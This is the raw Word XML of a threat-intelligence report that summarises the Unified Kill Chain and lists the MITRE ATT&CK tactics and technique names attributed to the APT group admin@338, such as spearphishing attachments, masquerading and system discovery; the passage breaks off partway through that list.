    <w:p w14:paraId="32E2E0B2" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8"/>
    <w:p w14:paraId="7F637B0E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00E5642C" w:rsidRDefault="003168F8" w:rsidP="00F200CC"/>
    <w:p w14:paraId="37945AFB" w14:textId="6CCCB7F1" w:rsidR="00A172DC" w:rsidRDefault="003168F8" w:rsidP="00A172DC">
      <w:r>
        <w:t>A summary of the Unified Kill Chain is given here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B98966" w14:textId="613F037C" w:rsidR="003168F8" w:rsidRPr="00A172DC" w:rsidRDefault="00BF21F8" w:rsidP="00A172DC">
      <w:r w:rsidRPr="00BF21F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49759ADE" wp14:editId="17F08158">
            <wp:extent cx="6645910" cy="2602865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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45910" cy="2602865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E40069" w14:textId="22538897" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:r>
        <w:t>Short hand references are used for the various elements in the chains below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C397470" w14:textId="274BE26F" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:r>
        <w:t>Initial Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60936746" w14:textId="7E98080F" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>IF-REC, IF-WEP, IF-DEL, IF-SEN, IF-EXP, IF-PER, IF-DEV, IF-C2C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3AADF" w14:textId="2FA7864D" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:r>
        <w:t>Network Propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D8061F" w14:textId="54A2C80C" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>NP-DIS, NP-PES, NP-EXE, NP-CAC, NP-LM</w:t>
      </w:r>
      <w:r w:rsidR="00DC5C9D">
        <w:t>V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD68E1" w14:textId="531BFC01" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:r>
        <w:t>Action on Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F9F28" w14:textId="07B37093" w:rsidR="00BF21F8" w:rsidRDefault="00BF21F8" w:rsidP="00BF21F8">
      <w:pPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:t>AO-COL, AO-EXF, AO-TMA, AO-OBJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A97311" w14:textId="79BABEDF" w:rsidR="00891095" w:rsidRDefault="00891095" w:rsidP="00BF21F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F889C3" w14:textId="0F9C7B4C" w:rsidR="00943069" w:rsidRPr="00402643" w:rsidRDefault="000C5472" w:rsidP="00943069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc110935493"/>
      <w:bookmarkStart w:id="9" w:name="_Toc153480832"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Documented Attacks from </w:t>
      </w:r>
      <w:r w:rsidR="00943069">
        <w:t>ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> by APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="59AE16DD" w14:textId="42F2239A" w:rsidR="00B16144" w:rsidRDefault="00B16144" w:rsidP="00943069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc110935494"/>
      <w:bookmarkStart w:id="11" w:name="_Toc153480833"/>
      <w:bookmarkStart w:id="12" w:name="_Hlk117369624"/>
      <w:r>
        <w:t>admin@338</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6228A616" w14:textId="75D299BB" w:rsidR="004F3BC4" w:rsidRPr="005B4630" w:rsidRDefault="00C94979" w:rsidP="004F3BC4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc110935495"/>
      <w:bookmarkStart w:id="14" w:name="_Toc153480834"/>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK </w:t>
      </w:r>
      <w:r w:rsidR="004F3BC4">
        <w:t>Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5B284EBF" w14:textId="77777777" w:rsidR="005935F8" w:rsidRPr="005935F8" w:rsidRDefault="005935F8" w:rsidP="005935F8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0018 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFE449"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5A10E"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Development </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50907C70"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Access </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>['T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA07AB2"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FE517"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ['T1204.002', 'T1203', 'T1059.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001144CB"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188E030" w14:textId="77777777" w:rsidR="005B3C56" w:rsidRPr="001B461B" w:rsidRDefault="005B3C56" w:rsidP="00B857D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC249AC"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679142D8"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE3FF2"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA7FAD5"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>['T1036.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668FF41F"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B952739"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Access </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E8701"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ['T1016', 'T1087.001', 'T1083', 'T1069.001', 'T1082', 'T1049', 'T1007']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E0E47"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r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303B239"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1087.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8EBEF"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r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F3B50" w14:textId="77777777" w:rsidR="005B3C56" w:rsidRPr="007407B4" w:rsidRDefault="005B3C56" w:rsidP="00B857D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1069.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Permission Groups Discovery&gt;:Local Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527326A8"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r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ED685"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r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36987DD7" w14:textId="77777777" w:rsidR="005B3C56" w:rsidRPr="005B3C56" w:rsidRDefault="005B3C56" w:rsidP="00B857D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
